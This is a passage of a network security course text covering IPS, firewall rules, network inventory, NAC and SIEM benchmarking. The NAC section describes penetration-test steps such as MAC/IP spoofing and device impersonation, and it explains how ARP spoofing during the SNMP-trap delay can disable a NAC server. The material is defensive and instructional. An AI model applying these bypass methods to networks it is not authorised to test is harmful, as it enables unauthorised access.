  • 45. 217 | P a g e NSS-rated IPS. The NSS-rated IPS blocks known and unknown vulnerability exploits, buffer overflows, D.o.S attacks and port scans from compromising and damaging enterprise information resources. IPS mechanisms include:  Protocol decoder-based analysis statefully decodes the protocol and then intelligently applies signatures to detect vulnerability exploits.  Protocol anomaly-based protection detects non-RFC compliant protocol usage such as the use of overlong URI or overlong FTP login.  Stateful pattern matching detects attacks across more than one packet, taking into account elements such as the arrival order and sequence.  Statistical anomaly detection prevents rate-based D.o.S flooding attacks.  Heuristic-based analysis detects anomalous packet and traffic patterns such as port scans and host sweeps.  Custom vulnerability or spyware phone home signatures that can be used in the either the anti- spyware or vulnerability protection profiles.  Other attack protection capabilities such as blocking invalid or malformed packets, IP defragmentation and TCP reassembly are utilized for protection against evasion and obfuscation methods employed by attackers. Traffic is normalized to eliminate invalid and malformed packets, while TCP reassembly and IP de- fragmentation is performed to ensure the utmost accuracy and protection despite any attack evasion techniques. URL Filtering Complementing the threat prevention and application control capabilities is a fully integrated, URL filtering database consisting of 20 million URLs across 76 categories that enables IT departments to monitor and control employee web surfing activities. The on-box URL database can be augmented to suit the traffic patterns of the local user community with a custom, 1 million URL database. URLs that
  • 46. 218 | P a g e are not categorized by the local URL database can be pulled into cache from a hosted, 180 million URL database. In addition to database customization, administrators can create custom URL categories to further tailor the URL controls to suit their specific needs. URL filtering visibility and policy controls can be tied to specific users through the transparent integration with enterprise directory services (Active Directory, LDAP, eDirectory) with additional insight provided through customizable reporting and logging. File and Data Filtering Data filtering features enable administrators to implement policies that will reduce the risks associated with the transfer of unauthorized files and data.  File blocking by type: Control the flow of a wide range of file types by looking deep within the payload to identify the file type (as opposed to looking only at the file extension).  Data filtering: Control the transfer of sensitive data patterns such as credit card and social security numbers in application content or attachments.  File transfer function control: Control the file transfer functionality within an individual application, allowing application use yet preventing undesired inbound or outbound file transfer. Checkpoint R75 – Application Control Blade Granular application control  Identify, allow, block or limit usage of thousands of applications by user or group  UserCheck technology alerts users about controls, educates on Web 2.0 risks, policies
  • 47. 219 | P a g e  Embrace the power of Web 2.0 Social Technologies and applications while protecting against threats and malware Largest application library with AppWiki  Leverages the world's largest application library with over 240,000 Web 2.0 applications and social network widgets  Identifies, detects, classifies and controls applications for safe use of Web 2.0 social technologies and communications  Intuitively grouped in over 80 categories—including Web 2.0, IM, P2P, Voice & Video and File Share Integrated into Check Point Software Blade Architecture  Centralized management of security policy via a single console  Activate application control on any Check Point security gateway  Supported gateways include: UTM-1, Power-1, IP Appliances and IAS Appliances Main Functionalities  Application detection and usage control  Enables application security policies to identify, allow, block or limit usage of thousands of applications, including Web 2.0 and social networking, regardless of port, protocol or evasive technique used to traverse the network.  AppWiki application classification library  AppWiki enables application scanning and detection of more than 4,500 distinct applications and over 240,000 Web 2.0 widgets including instant messaging, social networking, video streaming, VoIP, games and more.  Inspect SSL Encrypted Traffic  Scan and secure SSL encrypted traffic passing through the gateway, such as HTTPS.  UserCheck  UserCheck technology alerts employees in real-time about their application access limitations, while educating them on Internet risk and corporate usage policies.  User and machine awareness  Integration with the Identity Awareness Software Blade enables users of the Application Control Software Blade to define granular policies to control applications usage.  Central policy management  Centralized management offers unmatched leverage and control of application security policies and enables organizations to use a single repository for user and group definitions, network objects, access rights and security policies.  Unified event management  Using SmartEvent to view user’s online behavior and application usage provides organizations with the most granular level of visibility.
  • 48. 220 | P a g e Utilizing Firewalls for Maximum Security 1. Don’t use an old, non-application aware firewall 2. First Firewall rule must be deny all protocols on all ports from all IPs to all IPs 3. Only rules of requires systems must be allowed. For example: a. HTTP, HTTPS – to all b. IMAPS to internal mail server c. NetBIOS to internal file server and etc… 4. Activate Application inspection on all traffic on all ports 5. Enforce that only the defined traffic types would be allowed on that port. For Example on port 80 only identified HTTP traffic would be allowed. 6. Don’t allow forwarding of any traffic that was failed to be inspected. 7. Define the DNS server as the Domain Controller, do not allow recursive/authoritative DNS requests make sure the firewall inspects in STRICT mode that the Domain Controller’s outgoing DNS requests. 8. Active Egress filtering to avoid sending spoofed packets unknowingly and unwillingly participating in DDOS attacks. Implementing a Back-Bone Application-Aware Firewall Implementing a Back-Bone Application-Aware Firewall is the perfect, security solution for absolute network management. The best configuration is: 1. Combining full Layer 2 security in Switches and Router equipment 2. Diving all of the organization devices into VLANs which represents the organization’s Logical groups 3. Implementing each port in each one of the VLANs as PVLAN Edge, which no endpoint can talk with any other endpoint via Layer 2. 4. Defining all routers to forward all traffic to the firewall (their higher level hop) 5. Placing an application aware firewall as the backbone before the backbone router Network Inventory & Monitoring How to map your network connections? 1. Since the every day’s IT management has many tasks, no one really inspects what are the current open connections. 2. It is possible to configure the firewall to log every established TCP connection and every host which sent any packet (ICMP, UDP) to any non-TCP port.
  • 49. 221 | P a g e 3. The results of such configuration would be a list of unknown IPs. It is possible to write an automatic script to execute a Reverse-DNS lookup and an IP WHOIS search on each IP and create a “resolved list” which has some meaning to it. 4. Anything unknown/unfamiliar IP accessed from within the network, requires to match the number of stations which accessed it and to make a basic forensic investigation on them in order to discover the software which made the connection. 5. This process is very technical, time consuming, requires especially skilled security professionals and therefore is not executed unless a Security Incident was reported. 6. The only solution that reverses this process from being impossible to very reasonable and simple is IP/Domain/URL whitelisting, which denies everything except the database of the entire world’s known, well reputed and malware clean approved IPs/Websites. 7. IP/Domain/URL whitelisting is very hard to implement and requires a high amount of maintenance, it is up to you to make your choice. How to discover all network devices? 1. Mapping of the network is provided by Firewalls, Anti-Viruses, NACs, SIEM and Configuration Management products. 2. Some products include an agent that runs on the endpoint, acts as a network sensor and reports all the machines that passively or actively communicated on its subnet. 3. It is possible to purchase a “Network Inventory Management” solution. The most reliable way to detect all machines on the network is to combine: 1. The switches know all the ports that have electric power signal and know all the devices MACs if they ever sent a non-spoofed layer 2 frame on that port. 2. Connect via SNMP to switches and extract all MACs and IPs on all ports 3. Full network TCP and UDP scan of ports 1 to 65535 of the entire network (without any ping or is-alive scans). If there is a hidden machine that is listening on a self-defined IP on a specific TCP/UDP port, it will answer at least one packet and will be detected by the scan. Detecting “Hidden” Machines – Machines behind a NAT INSIDE Your Network 1. Looking for timing anomalies in ICMP and TCP 2. Looking for IP ID strangeness a. NAT with Windows on a Linux host might have non-incremental IPID packets, interspersed with incremental IPID packets 3. Looking for unusual headers in packets a. Timestamps and other optional parameters may have inherent patterns How to discover all cross-network installed software? There are two most common ways to discover the software installed on the networks machines:
  • 50. 222 | P a g e 1. Agent-Less – discovery is done by connecting to the machine remotely through: a. RPC/WMI b. SNMP On windows systems, WMI provides most of the classical functionality, though it only detects software installed by “Windows Installer” and software registered in the “Uninstall” registry Key. Some machines can’t bet “managed”/connected to remotely over the network since: 1. They have a firewall installed or configured to block WMI/RPC access 2. They have a permission error, “Domain Administrator” removed from the “Local Administrators” group 3. They are not part of the domain – they were never reported and registered 2. Agent-Based – provides the maximum level of discovery, can scan the memory, raw disk, files, folders locally and report back all of the detected software. Once the agent is installed, most of the common permission, firewalls, and connectivity and latency problems are solved. The main problem is machines the agent was removed from and stranger machines which never had the agent installed. 3. The Ultimate Solution – Combining agent-based with agent-less technology, this way all devices get detected and most of the possible information is extracted from them. NAC The Problem: Ethernet Network  Authenticate (Who): o distinguish between valid or rouge member  Control (Where to and How?): o all network members at the network level  Authorize (Application Layer Conditions): o check device compliance according to company policy
  • 51. 223 | P a g e What is a NAC originally?  The concept was invented in 2003 originally called “Network Admission Control”  The idea: checking the software version on machines connecting to the network  The Action: denying connection for those below the standard Today’s NAC?  Re-Invented as: Network Access Control  Adding to the old idea: Disabling ANY foreign machines from connecting into a computer network  The Actions: o Shuts down the power on that port of the switch o Move foreign machine to Guest VLAN Why Invent Today’s NAC?
  • 52. 224 | P a g e Dynamic Solution for a Dynamic Environment Did We EVER Manage Who Gets IP Access? What is a NAC? Network Access Control (NAC) is a computer networking solution that uses a set of protocols to define and implement a policy that describes how to secure access to network nodes by devices when they initially attempt to access the network. NAC might integrate the automatic remediation process (fixing non-compliant nodes before allowing access) into the network systems, allowing
  • 53. 225 | P a g e the network infrastructure such as routers, switches and firewalls to work together with back office servers and end user computing equipment to ensure the information system is operating securely before interoperability is allowed. Network Access Control aims to do exactly what the name implies—control access to a network with policies, including pre-admission endpoint security policy checks and post- admission controls over where users and devices can go on a network and what they can do. Initially 802.1X was also thought of as NAC. Some still consider 802.1X as the simplest form of NAC, but most people think of NAC as something more. Simple Explanation When a computer connects to a computer network, it is not permitted to access anything unless it complies with a business defined policy, including anti-virus protection level, system update level and configuration. While the computer is being checked by a pre-installed software agent, it can only access resources that can remediate (resolve or update) any issues. Once the policy is met, the computer is able to access network resources and the Internet, within the policies defined within the NAC system. NAC is mainly used for endpoint health checks, but it is often tied to Role based Access. Access to the network will be given according to profile of the person and the results of a posture/health check. For example, in an enterprise, the HR department could access only HR department files if both the role and the endpoint meet anti-virus minimums. Goals of NAC Because NAC represents an emerging category of security products, its definition is both evolving and controversial. The overarching goals of the concept can be distilled to: 1. Mitigation of zero-day attacks The key value proposition of NAC solutions is the ability to prevent end-stations that lack antivirus, patches, or host intrusion prevention software from accessing the network and placing other computers at risk of cross-contamination of computer worms. 2. Policy enforcement NAC solutions allow network operators to define policies, such as the types of computers or roles of users allowed to access areas of the network, and enforce them in switches, routers, and network middle boxes.
  • 54. 226 | P a g e 3. Identity and access management Where conventional IP networks enforce access policies in terms of IP addresses, NAC environments attempt to do so based on authenticated user identities, at least for user end- stations such as laptops and desktop computers. NAC Approaches  Agent-Full o Smarter, Unlimited Features o Faster o Works Offline (Settings Cache Mode) o Endpoint Management Itself is more secure  Agent-Less o Modular o Easy to integrate o Credentials constantly travel the network o SNMP Traps and DHCP Requests
  • 55. 227 | P a g e NAC – Behavior Lifecycle NAC = LAN Mini IPS?  NAC is one of the functions that a full end to end IPS product should provide  Some vendors don’t sell NAC as a proprietary module, for example: o ForeScout CounterAct  NAC only Solutions by o Trustwave o Mcafee NAC as Part of Endpoint Security Solutions  Antivirus Vendors provide NAC (Network Admission Control) on managed endpoints  Vendors like Symantec, Mcafee and Sophos  A great solution IF: o The AV Management server controls the switches and disconnects all non- managed hosts o Except exclusions (Printers, Cameras, Physical Access Devices) Talking Endpoints: What’s a NAP?  NAP is Microsoft’s built-in support client for NAC  NAP interoperates with every switch and access point  Controlled by Group Policy
  • 56. 228 | P a g e General Basic NAC Deployment NAC Deployment Types: 1. Pre-admission and post-admission There are two prevailing design philosophies in NAC, based on whether policies are enforced before or after end-stations gain access to the network. In the former case, called pre-admission NAC, end-stations are inspected prior to being allowed on the network. A typical use case of pre-admission NAC would be to prevent clients with out- of-date antivirus signatures from talking to sensitive servers. Alternatively, post- admission NAC makes enforcement decisions based on user actions, after those users have been provided with access to the network. 2. Agent versus agentless The fundamental idea behind NAC is to allow the network to make access control decisions based on intelligence about end-systems, so the manner in which the network is informed about end-systems is a key design decision. A key difference among NAC systems is whether they require agent software to report end-system characteristics, or
  • 57. 229 | P a g e whether they use scanning and network inventory techniques to discern those characteristics remotely. As NAC has matured, Microsoft now provides their network access protection (NAP) agent as part of their Windows 7, Vista and XP releases. There are NAP compatible agents for Linux and Mac OS X that provide near equal intelligence for these operating systems. 3. Out-of-band versus inline In some out-of-band systems, agents are distributed on end-stations and report information to a central console, which in turn can control switches to enforce policy. In contrast the inline solutions can be single-box solutions which act as internal firewalls for access-layer networks and enforce the policy. Out-of-band solutions have the advantage of reusing existing infrastructure; inline products can be easier to deploy on new networks, and may provide more advanced network enforcement capabilities, because they are directly in control of individual packets on the wire. However, there are products that are agentless, and have both the inherent advantages of easier, less risky out-of-band deployment, but use techniques to provide inline effectiveness for non- compliant devices, where enforcement is required. NAC Acceptance Tests 1. Attempting to get an IP using DHCP in a regular Windows machine. 2. Attempting to get an IP using DHCP in a regular Linux machine.
  • 58. 230 | P a g e 3. Multiple attempts to get an IP using DHCP with a private DHCP client with different values then the Operating Systems in the DHCP packet fields 4. Manually configuring a local IP of type “Link-Local” 5. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” on 6. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” off 7. Inspecting the NAC’s response to DHCP attacks and network attacks in the “1-2 minutes of grace” 8. Restricting the WMI (RPC) support on the local machine (even using a firewall to block RPC on TCP port 135) 9. Copy-Catting/Stealing the identity (IP or IP+MAC) of an existing user (received via passive network sniffing of broadcasts) 10. Using private Denial of Service 0-day exploits in a loop on a specific machine to obtain its identity on the network 11. Imposing as a printer or other non-smart devices (printers, biometric devices, turnstile controller, door devices and etc…) 12. Testing the proper enforcement common NAC basic protection features such as:  Duplicate MAC  Duplicate IP  Foreign MAC  Foreign IP  Wake Up On LAN  Domain Membership  Anti-Virus + Definitions NAC Vulnerabilities Attack a NAC is mostly based on network attacks and focuses on several aspects:  Vulnerabilities by Integration Process - Wrong product positioning in the network architecture, wrong design of the data flow which results in different levels of security. These mistakes are caused mostly by the following reasons: o Integrator’s Lack of understanding of the organization’s requirements, systems and network architecture o Integrator’s Lack of understanding of the organization’s security policies and its expectations from the product
  • 59. 231 | P a g e o Insufficient involvement of the organization’s IT personnel in the integration process o Lack of security auditing to determine the product real-life performance by a certified information security professional  Vulnerabilities caused by configuration –Wrong configuration of the functionalities the product enforces within the organization, such as: o Not enforcing/monitoring lab/development environments o Not enforcing /monitoring different VLANs and networks, such as the VoIP network o Not blocking/monitoring non-interactive network sniffing modes such as Wake Up On LAN o Not analyzing and responding to anomalies in relevant element/protocols, insufficient network lock-out times,  Vulnerabilities in the product (Vendor’s Code ) The common attack – Bypassing & Killing the NAC 1. Some of today’s NACs are event based, so the network equipment (switch/router) allows you to connect to the network and get an IP, but sometime after you connected to the network, it sends a message notifying the NAC with your IP and MAC and the NAC tries to connect to your machine and validate it is an approved member of the network.. 2. The alerting mechanism from the switches in mostly SNMP alerts called “SNMP Traps”. 3. This behavior grants the attacker one-two minutes to attack/take over/infect some machines on the network, before his port’s power is disconnected. 4. In most cases after 5 minutes if the port is shut down, the NAC wakes it back to life in order to keep the organization operable and to accept new devices. 5. For a well prepared hacker, with automatic scripts exploiting most common vulnerabilities and utilizing the latest exploits, this would be sufficient. 6. The real problem is that a large amount of the NAC vendors provide a product with is software based and therefore is installed mostly on common Windows or Linux Machines. 7. As it is well known, common Windows and Linux machines are vulnerable to many application layer and operating system vulnerabilities, but the absolute whole of them is vulnerable to network attacks, especially layer 2 attacks. 8. This means that on those 1 or 2 minutes which are available every 5 minutes which comes out to 5 to 10 minutes per hour, the attacker can find the Windows/Linux machine hosting the NAC software and kill the communication to it using basic layer 2 attacks such as ARP Spoofing.
  • 60. 232 | P a g e Open Source Solutions  OpenNac/FreeNAC  PacketFence OpenNAC/FreeNAC – Keeping It Simple
  • 61. 233 | P a g e
  • 62. 234 | P a g e PacketFence – Almost Commercial Quality
  • 63. 235 | P a g e
  • 64. 236 | P a g e
  • 65. 237 | P a g e
  • 66. 238 | P a g e SIEM - (Security Information Event Management) SIEM aka “SIM” (Security Information Management) and “SEM” (Security Event Management) solutions are a combination of the formerly disparate product categories of SIM (security information management) and SEM (security event management). SIEM technology provides real-time analysis of security alerts generated by network hardware and applications. SIEM solutions come as software, appliances or managed services, and are also used to log security data and generate reports for compliance purposes. The acronyms SEM, SIM and SIEM have been used interchangeably, though there are differences in meaning and product capabilities. The segment of security management that deals with real-time monitoring, correlation of events, notifications and console views is commonly known as Security Event Management (SEM). The second area provides long-term storage, analysis and reporting of log data and is known as Security Information Management (SIM). The term Security Information Event Management (SIEM), coined by Mark Nicolett and Amrit Williams of Gartner in 2005, describes the product capabilities of gathering, analyzing and presenting information from network and security devices; identity and access management applications; vulnerability management and policy compliance tools; operating system, database and application logs; and external threat data. A key focus is to monitor and help manage user and service privileges, directory services and other system configuration changes; as well as providing log auditing and review and incident response. As of January 2012, Mosaic Security Research identified 85 unique SIEM products. SIEM Capabilities  Data Aggregation: SIEM/LM (log management) solutions aggregate data from many sources, including network, security, servers, databases, applications, providing the ability to consolidate monitored data to help avoid missing crucial events.  Correlation: looks for common attributes, and links events together into meaningful bundles. This technology provides the ability to perform a variety of correlation techniques to integrate different sources, in order to turn data into useful information.  Alerting: the automated analysis of correlated events and production of alerts, to notify recipients of immediate issues.  Dashboards: SIEM/LM tools take event data and turn it into informational charts to assist in seeing patterns, or identifying activity that is not forming a standard pattern.  Compliance: SIEM applications can be employed to automate the gathering of compliance data, producing reports that adapt to existing security, governance and auditing processes.  Retention: SIEM/SIM solutions employ long-term storage of historical data to facilitate correlation of data over time, and to provide the retention necessary for compliance requirements.
  • 67. 239 | P a g e SIEM Architecture  Low level, real-time detection of known threats and anomalous activity (unknown threats)  Compliance automation  Network, host and policy auditing  Network behavior analysis and situational behavior  Log Management  Intelligence that enhances the accuracy of threat detection  Risk oriented security analysis  Executive and technical reports  A scalable high performance architecture
  • 68. 240 | P a g e A SIEM Detector Module is Comprised a few main Modules: 1. Detector  Intrusion Detection  Anomaly Detection  Vulnerability Detection  Discovery, Learning and Network Profiling systems  Inventory systems 2. Collector  Connectors to Windows Machines  Connectors to Linux Machines  Connectors to Network Devices  Classifies the information and events  Normalizes the information 3. SIEM  Risk Assessment  Correlation
  • 69. 241 | P a g e  Risk metrics  Vulnerability scanning  Data mining for events  Real-time monitoring 4. Logger  Stores the data in the filesystem/DB  Allows storage of unlimited number of events  Supports SAN/NAS storage 5. Management Console & Dashboard  Configuration changes  Access to Dashboard and Metrics  Multi-tenant and Multi-user management  Access to Real-time information  Reports generation  Ticketing system  Vulnerability Management  Network Flows Management  Reponses configuration A SIEM Detector Module is Comprised of Sensors:  Intrusion Detection  Anomaly Detection  Vulnerability Detection  Discovery, Learning and Network Profiling systems  Inventory systems A SIEM Commonly used Open Source Sensors: 1. Snort (Network Intrusion Detection System) 2. Ntop (Network and usage Monitor) 3. OpenVAS (Vulnerability Scanning) 4. P0f (Passive operative system detection) 5. Pads (Passive Asset Detection System) 6. Arpwatch (Ethernet/IP address parings monitor) 7. OSSEC (Host Intrusion Detection System) 8. Osiris (Host Integrity Monitoring) 9. Nagios (Availability Monitoring) 10. OCS (Inventory)
  • 70. 242 | P a g e SIEM Logics
  • 71. 243 | P a g e Planning for the right amounts of data Introduction Critical business systems and their associated technologies are typically held to performance benchmarks. In the security space, benchmarks of speed, capacity and accuracy are common for encryption, packet inspection, assessment, alerting and other critical protection technologies. But how do you set benchmarks for a tool based on collection, normalization and correlation of security events from multiple logging devices? And how do you apply these benchmarks to today’s diverse network environments? This is the problem with benchmarking Security Information Event Management (SIEM) systems, which collect security events from one to thousands of devices, each with its own different log data format. If we take every conceivable environment into consideration, it is impossible to benchmark SIEM systems. We can, however, set one baseline environment against which to benchmark and then include equations so that organizations can extrapolate their own benchmark requirements. Consider that network and application firewalls, network and host Intrusion Detection/Prevention (IDS/IPS), access controls, sniffers, and Unified Threat Management systems (UTM)—all log security events that must be monitored. Every switch, router, load balancer, operating system, server, badge reader, custom or legacy application, and many other IT systems across the enterprise, produce logs of security events, along with every new system to follow (such as virtualization). Most have their own log expression formats. Some systems, like legacy applications, don’t produce logs at all. First we must determine what is important. Do we need all log data from every critical system in order to perform security, response, and audit? Will we need all that data at lightning speed? (Most likely, we will not.) How much data can the network and collection tool actually handle under load? What is the threshold before networks bottleneck and/or the SIEM is rendered unusable, not unlike a denial of service (DOS)? These are variables that every organization must consider as they hold SIEM to standards that best suit their operational goals. Why is benchmarking SIEM important? According to the National Institute of Standards (NIST), SIEM software is a relatively new type of centralized logging software compared to syslog. Our SANS Log Management Survey shows 51 percent of respondents ranked collecting logs as their most critical challenge – and collecting logs is a basic feature a SIEM system can provide. Further, a recent NetworkWorld article explains how different SIEM products typically integrate well with selected logging tools, but not with all tools. This is due to the disparity between logging and reporting formats from different systems. There is an effort under way to standardize logs through MITRE’s Common Event Expression (CEE) standard event log language.
  • 72. 244 | P a g e But until all logs look alike, normalization is an important SIEM benchmark, which is measured in events per second (EPS). Event performance characteristics provide a metric against which most enterprises can judge a SIEM system. The true value of a SIEM platform, however, will be in terms of Mean Time To Remediate (MTTR) or other metrics that can show the ability of rapid incident response to mitigate risk and minimize operational and financial impact. In our second set of benchmarks for storage and analysis, we have addressed the ability of SIEM to react within a reasonable MTTR rate to incidents that require automatic or manual intervention. Because this document is a benchmark, it does not cover the important requirements that cannot be benchmarked, such as requirements for integration with existing systems (agent vs. agent-less, transport mechanism, ports and protocols, interface with change control, usability of user interface, storage type, integration with physical security systems, etc.). Other requirements that organizations should consider but aren’t benchmarked include the ability to process connection- specific flow data from network elements, which can be used to further enhance forensic and root- cause analysis. Other features, such as the ability to learn from new events, make recommendations and store them locally, and filter out incoming events from known infected devices that have been sent to remediation, are also important features that should be considered, but are not benchmarked here. Variety and type of reports available, report customization features, role-based policy management and workflow management are more features to consider as they apply to an individual organization’s needs but are not included in this benchmark. In addition, organizations should look at a SIEM tool’s overall history of false positives, something that can be benchmarked, but is not within the scope of this paper. In place of false positives, Table 2 focuses on accuracy rates within applicable categories. These and other considerations are included in the following equations, sample EPS baseline for a medium-sized enterprise, and benchmarks that can be applied to storage and analysis. As appendices, we’ve included a device map for our sample network and a calculation worksheet for organizations to use in developing their own EPS benchmarks. SIEM Benchmarking Process The matrices that follow are designed as guidelines to assist readers in setting their own benchmark requirements for SIEM system testing. While this is a benchmark checklist, readers must remember that benchmarking, itself, is governed by variables specific to each organization. For a real-life example, consider an article in eSecurity Planet, in which Aurora Health in Michigan estimated that they produced 5,000–10,000 EPS, depending upon the time of day. We assume that means during the normal ebb and flow of network traffic. What would that load look like if it were under attack? How many security events would an incident, such as a virus outbreak on one, two or three subnets, produce?
  • 73. 245 | P a g e An organization also needs to consider their devices. For example, a Nokia high-availability firewall is capable of handling more than 100,000 connections per second, each of which could theoretically create a security event log. This single device would seem to imply a need for 100,000 minimum EPS just for firewall logs. However, research shows that SIEM products typically handle 10,000–15,000 EPS per collector. Common sense tells us that we should be able to handle as many events as ALL our devices could simultaneously produce as a result of a security incident. But that isn’t a likely scenario, nor is it practical or necessary. Aside from the argument that no realistic scenario would involve all devices sending maximum EPS, so many events at once would create bottlenecks on the network and overload and render the SIEM collectors useless. So, it is critical to create a methodology for prioritizing event relevance during times of load so that even during a significant incident, critical event data is getting through, while ancillary events are temporarily filtered. Speed of hardware, NICs (network interface cards), operating systems, logging configurations, network bandwidth, load balancing and many other factors must also go into benchmark requirements. One may have two identical server environments with two very different EPS requirements due to any or all of these and other variables. With consideration of these variables, EPS can be established for normal and peak usage times. We developed the equations included here, therefore, to determine Peak Events (PE) per second and to establish normal usage by exchanging the PEx for NEx (Normal Events per second). List all of the devices in the environment expected to report to the SIEM. Be sure to consider any planned changes, such as adding new equipment, consolidating devices, or removing end of life equipment. First, determine the PE (or NE) for each device with these steps: 1. Carefully select only the security events intended to be collected by the SIEM. Make sure those are the only events included in the sample being used for the formula. 2. Select reasonable time frames of known activity: Normal and Peak (under attack, if possible). This may be any period from minutes to days. A longer period of time, such as a minimum of 90 days, will give a more accurate average, especially for “normal” activity. Total the number of Normal or Peak events during the chosen period. (It will also be helpful to consider computing a “low” activity set of numbers, because fewer events may be interesting as well.) 3. Determine the number of seconds within the time frame selected. 4. Divide the number of events by the number of seconds to determine PE or NE for the selected device. Formula 1: # of Security Events = EPS Time Period in Seconds
  • 74. 246 | P a g e 1. The resulting EPS is the PE or NE depending upon whether we began with peak activity or normal activity. Once we have completed this computation for every device needing security information event management, we can insert the resulting numbers in the formula below to determine Normal EPS and Peak EPS totals for a benchmark requirement. Formula 2: 1. In your production environment determine the peak number of security events (PEx) created by each device that requires logging using Formula1. (If you have identical devices with identical hardware, configurations, load, traffic, etc., you may use this formula to avoid having to determine PE for every device): 2. [PEx (# of identical devices)] Sum all PE numbers to come up with a grand total for your environment 3. 3. Add at least 10% to the Sum for headroom and another 10% for growth. So, the resulting formula looks like this: Step 1: (PE1+PE2+PE3...+ (PE4 x D4) + (PE5 x D5)...) = SUM1 [baseline PE] Step 2: SUM1 + (SUM1 x 10%) = SUM2 [adds 10% headroom] Step 3: SUM2 + (SUM2 x 10%) = Total PE benchmark requirement [adds 10% growth potential] Once these computations are complete, the resulting Peak EPS set of numbers will reflect that grand, but impractical, peak total mentioned above. Again, it is unlikely that all devices will ever simultaneously produce log events at maximum rate. Seek consultation from SMEs and the system engineers provided by the vendor in order to establish a realistic Peak EPS that the SIEM system must be able to handle, and then set filters for getting required event information through to SIEM analysis, should an overload occur. We have used these equations to evaluate a hypothetical mid-market network with a set number of devices. If readers have a similar infrastructure, similar rates may apply. If the organization is different, the benchmark can be adjusted to fit organizational infrastructures using our equations. The Baseline Network A mid-sized organization is defined as having 500–1000 users, according to a December guide by Gartner, Inc., titled “Gartner’s New SMB Segmentation and Methodology.” Gartner Principal Analyst Adam Hils, together with a team of Gartner analysts, helped us determine that a 750– 1000 user organization is a reasonable base point for our benchmark. As Hils puts it, this number represents some geo and technical diversity found in large enterprises without being too complex to scope and benchmark. With Gartner’s advice, we set our hypothetical organization to have 750 employees, 750 user end points, five offices, six subnets, five databases, and a central data center. Each subnet will have
  • 75. 247 | P a g e an IPS, a switch and gateway/router. The data center has four firewalls and a VPN. (See the matrix below and Appendix A, “Baseline Network Device Map,” for more details.) Once the topography is defined, the next stage is to average EPS collected from these devices during normal and peak periods. Remember that demanding all log data at the highest speed 24x7 could, in it, become problematic, causing a potential DOS situation with network or SIEM system overload. So realistic speeds based on networking and SIEM product restrictions must also be considered in the baseline. Protocols and data sources present other variables considered determining average and peak load requirements. In terms of effect on EPS rates, our experience is that systems using UDP can generate more events more quickly, but this creates a higher load for the management tool, which actually slows collection and correlation when compared to TCP. One of our reviewing analysts has seen UDP packets dropped at 3,000 EPS, while TCP could maintain a 100,000 EPS load. It’s also been our experience that use of both protocols in single environment. Table 1, “Baseline Network Device EPS Averages,” provides a breakdown of Average, Peak and Averaged Peak EPS for different systems logs are collected from. Each total below is the result of device quantity (column 1) x EPS calculated for the device. For example, 0.60 Average EPS for Cisco Gateway/Routers has already been multiplied by the quantity of 7 devices. So the EPS per single device is not displayed in the matrix, except when the quantity is 1. To calculate Average Peak EPS, we determined two subnets under attack, with affected devices sending 80 percent of their EPS capacity to the SIEM. These numbers are by no means scientific. But they do represent research against product information (number of events devices are capable of producing), other research, and the consensus of expert SANS Analysts contributing to this paper.
  • 76. 248 | P a g e A single security incident, such as a quickly replicating worm in a subnet, may fire off thousands of events per second from the firewall, IPS, router/switch, servers, and other infrastructure at a single gateway. What if another subnet falls victim and the EPS are at peak in two subnets? Using our baseline, such a scenario with two infected subnets representing 250 infected end points could theoretically produce 8,119 EPS. We used this as our Average Peak EPS baseline because this midline number is more representative of a serious attack on an organization of this size. In this scenario, we still have event information coming from servers and applications not directly under attack, but there is potential impact to those devices. It is important, therefore, that these normal logs, which are useful in analysis and automatic or manual reaction, continue to be collected as needed.
  • 77. 249 | P a g e SIEM Storage and Analysis Now that we have said so much about EPS, it is important to note that no one ever analyzes a single second’s worth of data. An EPS rating is simply designed as a guideline to be used for evaluation, planning and comparison. When designing a SIEM system, one must also consider the volume of data that may be analyzed for a single incident. If an organization collects an average of 20,000 EPS over eight hours of an ongoing incident, that will require sorting and analysis of 576,000,000 data records. Using a 300 byte average size, that amounts to 172.8 gigabytes of data. This consideration will help put into perspective some reporting and analysis baselines set in the below table. Remember that some incidents may last for extended periods of time, perhaps tapering off, then spiking in activity at different points during the attack. While simple event performance characteristics provide a metric against which most enterprises can judge a SIEM, as mentioned earlier, the ultimate value of a well-deployed SIEM platform will be in terms of MTTR (Mean “Time To Remediate”) or other metrics that can equate rapid incident response to improved business continuity and minimal operational/fiscal impact. It should be noted in this section, as well, that event storage may refer to multiple data facilities within the SIEM deployment model. There is a local event database, used to perform active investigations and forensic analysis against recent activities; long-term storage, used as an archive of summarized event information that is no longer granular enough for comprehensive forensics; and read/only and encrypted raw log storage, used to preserve the original event for forensic analysis and nonrepudiation—guaranteeing chain of custody for regulatory compliance.
  • 78. 250 | P a g e
  • 79. 251 | P a g e Baseline Network Device Map This network map is the diagram for our sample network. Traffic flow, points for collecting and/or forwarding event data, and throttle points were all considered in setting the benchmark baseline in Table 1.
  • 80. 252 | P a g e EPS Calculation Worksheet Common SIEM Report Types 1. Security SIEM DB 2. Logger DB 3. Alarms 4. Incidents 5. Vulnerabilities 6. Availability 7. Network Statistics 8. Asset Information and Inventory 9. Ticketing system 10. Network
  • 81. 253 | P a g e Custom Reports Defining the right Rules – It’s all about the rules When it comes to a SIEM, it is all about the rules. The SIEM can be configured to be most effective and produce the best results by: 1. Defining the right rules that define “what is considered a security event/incident” 2. Implementing an automated response/mitigation action to stop it at real time 3. Configuring it to alert the right person for each incident - in real time An example of a subset of a few events, which together represent a security incident: 1. Some IP on the internet does port scanning on the organization’s IP, port scan is detected and logged 2. 10 days later, a machine from the internal network connects to that IP = Intrusion!
  • 82. 254 | P a g e IDS/IPS Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network and/or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about said activity, attempt to block/stop activity, and report activity. Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent/block intrusions that are detected. More specifically, IPS can take such actions as sending an alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address. An IPS can also correct Cyclic Redundancy Check (CRC) errors, un-fragment packet streams, prevent TCP sequencing issues, and clean up unwanted transport and network layer options
